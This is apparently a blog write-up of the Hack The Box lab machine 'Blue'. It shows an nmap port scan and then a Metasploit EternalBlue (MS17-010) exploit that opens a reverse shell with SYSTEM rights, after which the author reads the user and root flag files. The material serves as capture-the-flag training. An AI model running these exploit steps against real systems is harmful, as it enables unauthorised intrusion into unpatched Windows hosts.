HTB: Blue


This machine is Blue from Hack The Box


I started with an nmap scan

root@kali:~# nmap -sV -p- -T4
Starting Nmap 7.70 ( ) at 2019-07-07 14:42 EDT
Nmap scan report for
Host is up (0.041s latency).
Not shown: 65526 closed ports
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 112.41 seconds


Well the machine is called Blue, and smb is open, so eternal blue seems like a good start

root@kali:~# msfconsole

msf5 > use exploit/windows/smb/ms17_010_eternalblue

msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS

msf5 exploit(windows/smb/ms17_010_eternalblue) > set LHOST

msf5 exploit(windows/smb/ms17_010_eternalblue) > set LPORT 4444
LPORT => 4444

msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on
[+]       - Host is likely VULNERABLE to MS17-010! -
[*] Command shell session 1 opened ( -> at 2019-07-07 14:47:44 -0400
[+] - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

And there is a shell

nt authority\system

Now for my flags

 Volume in drive C has no label.
 Volume Serial Number is A0EF-1911

 Directory of C:\Users

21/07/2017  07:56    <DIR>          .
21/07/2017  07:56    <DIR>          ..
21/07/2017  07:56    <DIR>          Administrator
14/07/2017  14:45    <DIR>          haris
12/04/2011  08:51    <DIR>          Public
               0 File(s)              0 bytes
               5 Dir(s)  15,753,904,128 bytes free

C:\Users>cd haris/desktop

C:\Users\haris\Desktop>type user.txt

C:\Users\haris\Desktop>cd ../../Administrator/Desktop

C:\Users\Administrator\Desktop>type root.txt

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.